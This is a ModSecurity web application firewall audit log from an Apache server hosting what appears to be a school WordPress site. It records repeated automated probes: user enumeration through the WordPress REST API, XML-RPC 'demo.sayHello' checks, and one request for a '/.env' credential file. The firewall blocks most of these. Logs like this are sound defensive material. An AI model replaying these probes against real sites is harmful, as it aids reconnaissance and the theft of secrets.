Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5126fe41-Z-- --f36f9979-A-- [08/May/2025:14:45:03 +0700] aBxg_44K347NtBcwXKwbvQAAAIs 103.236.140.4 42496 103.236.140.4 8181 --f36f9979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f36f9979-C-- demo.sayHello --f36f9979-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f36f9979-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690303717762 5599 (- - -) Stopwatch2: 1746690303717762 5599; combined=3982, p1=526, p2=3254, p3=32, p4=30, p5=83, sr=67, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f36f9979-Z-- --f29ea025-A-- [08/May/2025:14:45:04 +0700] aBxhAMP9GxxPAbCroFbf3wAAAEM 103.236.140.4 42542 103.236.140.4 8181 --f29ea025-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f29ea025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29ea025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690304848271 2748 (- - -) Stopwatch2: 1746690304848271 2748; combined=1237, p1=420, p2=787, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29ea025-Z-- --43eded6f-A-- [08/May/2025:14:45:13 +0700] aBxhCY4K347NtBcwXKwb1AAAAIA 103.236.140.4 42892 103.236.140.4 8181 --43eded6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43eded6f-C-- demo.sayHello --43eded6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43eded6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690313410359 5885 (- - -) Stopwatch2: 1746690313410359 5885; combined=4289, p1=541, p2=3542, p3=30, p4=32, p5=85, sr=78, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43eded6f-Z-- --c0f1616b-A-- [08/May/2025:14:46:09 +0700] aBxhQY4K347NtBcwXKwcqwAAAIU 103.236.140.4 45156 103.236.140.4 8181 --c0f1616b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0f1616b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f1616b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690369113901 2734 (- - -) Stopwatch2: 1746690369113901 2734; combined=1249, p1=392, p2=828, p3=0, p4=0, p5=29, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f1616b-Z-- --6dcbc171-A-- [08/May/2025:14:46:15 +0700] aBxhR6cs1DvJ_HgMHE8MKQAAAAo 103.236.140.4 45428 103.236.140.4 8181 --6dcbc171-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6dcbc171-C-- demo.sayHello --6dcbc171-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dcbc171-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690375236570 5779 (- - -) Stopwatch2: 1746690375236570 5779; combined=4279, p1=535, p2=3518, p3=31, p4=35, p5=94, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dcbc171-Z-- --d15fd413-A-- [08/May/2025:14:48:52 +0700] aBxh5Kcs1DvJ_HgMHE8NlgAAAAg 103.236.140.4 51842 103.236.140.4 8181 --d15fd413-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d15fd413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d15fd413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690532542320 2805 (- - -) Stopwatch2: 1746690532542320 2805; combined=1154, p1=380, p2=740, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d15fd413-Z-- --88195b4b-A-- [08/May/2025:14:49:02 +0700] aBxh7is5rYyn3jlLjjLSlQAAANM 103.236.140.4 52258 103.236.140.4 8181 --88195b4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88195b4b-C-- demo.sayHello --88195b4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88195b4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690542497404 5446 (- - -) Stopwatch2: 1746690542497404 5446; combined=4370, p1=563, p2=3553, p3=62, p4=37, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88195b4b-Z-- --f2f43320-A-- [08/May/2025:15:00:44 +0700] aBxkrI4K347NtBcwXKwlMwAAAJU 103.236.140.4 52020 103.236.140.4 8181 --f2f43320-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2f43320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f43320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746691244876226 2671 (- - -) Stopwatch2: 1746691244876226 2671; combined=1433, p1=406, p2=985, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f43320-Z-- --dd03bf44-A-- [08/May/2025:15:00:51 +0700] aBxks6cs1DvJ_HgMHE8U1QAAABY 103.236.140.4 52292 103.236.140.4 8181 --dd03bf44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd03bf44-C-- demo.sayHello --dd03bf44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd03bf44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746691251492056 5340 (- - -) Stopwatch2: 1746691251492056 5340; combined=3922, p1=461, p2=3244, p3=36, p4=32, p5=86, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd03bf44-Z-- --08c6c046-A-- [08/May/2025:15:04:55 +0700] aBxlp6cs1DvJ_HgMHE8XiAAAAAE 103.236.140.4 33912 103.236.140.4 8181 --08c6c046-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --08c6c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08c6c046-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746691495006358 912 (- - -) Stopwatch2: 1746691495006358 912; combined=326, p1=277, p2=0, p3=0, p4=0, p5=48, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08c6c046-Z-- --34667d08-A-- [08/May/2025:15:16:24 +0700] aBxoWI4K347NtBcwXKwu-wAAAJE 103.236.140.4 33140 103.236.140.4 8181 --34667d08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --34667d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34667d08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746692184864149 4006 (- - -) Stopwatch2: 1746692184864149 4006; combined=2143, p1=657, p2=1453, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34667d08-Z-- --6e97a440-A-- [08/May/2025:15:16:32 +0700] aBxoYMP9GxxPAbCroFbysAAAAE4 103.236.140.4 33432 103.236.140.4 8181 --6e97a440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e97a440-C-- demo.sayHello --6e97a440-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e97a440-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746692192034110 5650 (- - -) Stopwatch2: 1746692192034110 5650; combined=4214, p1=564, p2=3384, p3=89, p4=32, p5=88, sr=64, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e97a440-Z-- --a396b845-A-- [08/May/2025:15:21:45 +0700] aBxpmY4K347NtBcwXKwxmgAAAIc 103.236.140.4 46142 103.236.140.4 8181 --a396b845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.18.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.18.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a396b845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a396b845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746692505140507 3081 (- - -) Stopwatch2: 1746692505140507 3081; combined=1647, p1=487, p2=1132, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a396b845-Z-- --105ca61f-A-- [08/May/2025:15:56:15 +0700] aBxxr6cs1DvJ_HgMHE85FAAAAAs 103.236.140.4 44154 103.236.140.4 8181 --105ca61f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --105ca61f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105ca61f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746694575586768 2332 (- - -) Stopwatch2: 1746694575586768 2332; combined=1247, p1=415, p2=798, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105ca61f-Z-- --92210d19-A-- [08/May/2025:15:56:22 +0700] aBxxto4K347NtBcwXKxEngAAAIE 103.236.140.4 44418 103.236.140.4 8181 --92210d19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --92210d19-C-- demo.sayHello --92210d19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --92210d19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746694582102973 5786 (- - -) Stopwatch2: 1746694582102973 5786; combined=4351, p1=595, p2=3502, p3=31, p4=61, p5=95, sr=102, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92210d19-Z-- --71bb3479-A-- [08/May/2025:16:11:25 +0700] aBx1PSs5rYyn3jlLjjL-hwAAAMA 103.236.140.4 52496 103.236.140.4 8181 --71bb3479-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71bb3479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71bb3479-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695485500502 2490 (- - -) Stopwatch2: 1746695485500502 2490; combined=1168, p1=375, p2=764, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71bb3479-Z-- --356f6b71-A-- [08/May/2025:16:15:23 +0700] aBx2K6cs1DvJ_HgMHE9HXAAAABM 103.236.140.4 33838 103.236.140.4 8181 --356f6b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --356f6b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --356f6b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695723903366 2716 (- - -) Stopwatch2: 1746695723903366 2716; combined=1211, p1=398, p2=785, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
